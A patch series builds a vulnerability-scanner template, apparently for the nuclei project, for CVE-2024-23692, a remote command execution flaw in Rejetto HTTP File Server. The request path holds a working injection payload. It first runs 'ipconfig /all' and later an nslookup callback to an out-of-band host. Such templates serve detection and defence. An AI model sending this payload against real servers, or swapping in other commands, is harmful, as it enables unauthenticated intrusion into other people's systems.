From e322f3142143be9fb01bf343bc1c7b30152e73ed Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:04:41 -0300 Subject: [PATCH 1/9] Create CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2024/CVE-2024-23692 diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 new file mode 100644 index 0000000000..5b4a4f401b --- /dev/null +++ b/http/cves/2024/CVE-2024-23692 @@ -0,0 +1,25 @@ +id: CVE-2024-23692 + +info: + name: HFS Command Injection RCE + author: johnk3r + severity: critical + tags: rce,hfs,cve + +requests: + - method: GET + path: + - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + + matchers: + - type: regex + part: body + regex: + - "Windows IP Configuration" + - "Host Name" + + extractors: + - type: regex + part: body + regex: + - "Host Name .+ : ([^\r\n]+)" From f3bcd3e920554a5915c0f78581b6731a757102d8 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:08:35 -0300 Subject: [PATCH 2/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 5b4a4f401b..7c8569bf95 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,10 +1,19 @@ id: CVE-2024-23692 info: - name: HFS Command Injection RCE + name: Check Point Quantum Gateway - Information Disclosure author: johnk3r - severity: critical - tags: rce,hfs,cve + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + reference: + - https://github.com/rapid7/metasploit-framework/pull/19240 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: product:"HttpFileServer httpd" + tags: cve,cve2024,hfs,rce requests: - method: GET From cc743cfc3ad0a4d80f6451b6f9e326d8d6def24a Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:10:18 -0300 Subject: [PATCH 3/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 7c8569bf95..f3a81865e7 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,11 +1,11 @@ id: CVE-2024-23692 info: - name: Check Point Quantum Gateway - Information Disclosure + name: Rejetto HTTP File Server - Template injection author: johnk3r severity: high description: | - CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ From 84f71fee89b8b8227fb8294bd7f26469cc918c5d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:12:47 -0300 Subject: [PATCH 4/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index f3a81865e7..76493f5f7d 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -3,7 +3,7 @@ id: CVE-2024-23692 info: name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: high + severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: From d201d27254d3d0a55211894daf27d058537e8168 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:13:50 -0300 Subject: [PATCH 5/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 76493f5f7d..c8020027d8 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -8,7 +8,8 @@ info: This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce + - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 metadata: verified: true max-request: 1 From ff26a49d5d399b3eac593d277489752276673c07 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 7 Jun 2024 22:51:25 -0300 Subject: [PATCH 6/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 29 +++++++++++++---------------- 1 file changed, 13 insertions(+), 16 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index c8020027d8..e60a524677 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,15 +1,14 @@ id: CVE-2024-23692 info: - name: Rejetto HTTP File Server - Template injection + name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: critical + severity: high description: | - This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce - - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ metadata: verified: true max-request: 1 @@ -19,17 +18,15 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "Windows IP Configuration" - - "Host Name" + - type: word + part: interactsh_protocol + words: + - "dns" - extractors: - - type: regex - part: body - regex: - - "Host Name .+ : ([^\r\n]+)" + - type: status + status: + - 200 From 9fac5e2524b70384c8c25b6208f8e477ebbef6a1 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 8 Jun 2024 15:08:41 -0300 Subject: [PATCH 7/9] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index e60a524677..99cffeff67 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -3,7 +3,7 @@ id: CVE-2024-23692 info: name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: high + severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: From 1f1295a37d39e038cd816484dcaaa635c889688e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 9 Jun 2024 05:20:49 +0530 Subject: [PATCH 8/9] minor update --- http/cves/2024/CVE-2024-23692 | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 99cffeff67..aa8c5c5096 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -15,7 +15,7 @@ info: shodan-query: product:"HttpFileServer httpd" tags: cve,cve2024,hfs,rce -requests: +http: - method: GET path: - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" @@ -27,6 +27,7 @@ requests: words: - "dns" - - type: status - status: - - 200 + - type: word + part: body + words: + - "rejetto" From 6091f89bfbdf1b82e53d47269872e7ed6f4c1a1d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 16:59:08 +0530 Subject: [PATCH 9/9] Update and rename CVE-2024-23692 to CVE-2024-23692.yaml --- http/cves/2024/{CVE-2024-23692 => CVE-2024-23692.yaml} | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) rename http/cves/2024/{CVE-2024-23692 => CVE-2024-23692.yaml} (83%) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692.yaml similarity index 83% rename from http/cves/2024/CVE-2024-23692 rename to http/cves/2024/CVE-2024-23692.yaml index aa8c5c5096..97807850d9 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692.yaml @@ -9,11 +9,16 @@ info: reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-23692 + cwe-id: CWE-1336 metadata: verified: true max-request: 1 shodan-query: product:"HttpFileServer httpd" - tags: cve,cve2024,hfs,rce + tags: cve,cve2024,hfs,rejetto,rce http: - method: GET